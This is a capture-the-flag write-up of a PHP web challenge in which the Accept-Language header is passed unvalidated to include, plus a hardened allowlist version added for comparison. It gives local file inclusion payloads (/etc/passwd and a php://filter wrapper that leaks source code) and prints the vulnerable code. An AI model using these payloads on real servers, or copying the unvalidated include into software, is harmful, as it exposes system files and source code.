March 19, 2014

RuCTF: Web 100 (php)

The page shows some text from Wikipedia (or from somewhere else, I don't care); the interesting thing is that it shows "Language was detect automatically :)" at the end of the text.
It seems like a hint, so let's try to use the Accept-Language header.
First of all, set Accept-Language to ru/en: the page changes according to the selected language.
So let's test it for LFI with Accept-Language: /etc/passwd. It shows the contents of /etc/passwd!
But there is nothing interesting in /etc/passwd, so let's get the source of the script itself with Accept-Language: php://filter/convert.base64-encode/resource=index.php
After decoding the base64 we get the source of the script:
<!doctype html>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
<?php
  header('Content-Type: text/html; charset=utf-8');
  $flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
  $ok   = 0;
  // Every comma-separated Accept-Language entry is passed to include unvalidated: this is the LFI
  foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
    // Drop the ";q=..." part, keep the language tag
    $l = explode(';', $s)[0];
    if (include $l) {
      $ok = 1;
    }
  }
  if (!$ok) {
    include 'en';
    echo 'Language was not detect automatically :(';
  } else {
    echo 'Language was detect automatically :)';
  }
?>
The flag is 5cf27d9bad2fe9d96d2bcf25c3b0bd14
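
For comparison, a hardened version of the language selection, added here as an example and not part of the challenge's code: the header value is only ever used as a key into a fixed allowlist, never as a path. The lang/ directory, the en.php/ru.php file names and the pick_language() helper are assumptions made for the illustration.

```php
<?php
// Added example (not the challenge's code): allowlist-based language selection.
// Assumption: translations live in lang/en.php and lang/ru.php next to this script.

const LANG_DIR = __DIR__ . '/lang';
const LANGS = ['en' => 'en.php', 'ru' => 'ru.php'];  // hypothetical file names

/**
 * Return the first supported language code named in an Accept-Language
 * header, or null when none of the entries is supported.
 */
function pick_language(string $header): ?string
{
    foreach (explode(',', $header) as $entry) {
        // Drop the ";q=..." weight, then keep only the primary subtag ("ru-RU" -> "ru").
        $tag = strtolower(trim(explode(';', $entry)[0]));
        $primary = explode('-', $tag)[0];
        // The value is only compared against allowlist keys, so file paths and
        // stream wrappers such as "php://..." simply fail to match.
        if (array_key_exists($primary, LANGS)) {
            return $primary;
        }
    }
    return null;
}

// Constructed sample headers, including the two values used in the write-up.
$samples = [
    'ru-RU,ru;q=0.9,en;q=0.8',
    '/etc/passwd',
    'php://filter/convert.base64-encode/resource=index.php',
    'de,../../etc/passwd;q=0.5,en',
];

foreach ($samples as $header) {
    $lang = pick_language($header) ?? 'en';      // fall back to the default language
    $file = LANG_DIR . '/' . LANGS[$lang];       // path is built from constants only
    printf("%-55s -> %s\n", $header, $file);
    // include $file;  // in the real page: $file can only be one of the two fixed paths
}
```

Run from the command line, the first header resolves to ru.php and the other three fall back to en.php, because nothing from the request ever reaches the include path.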

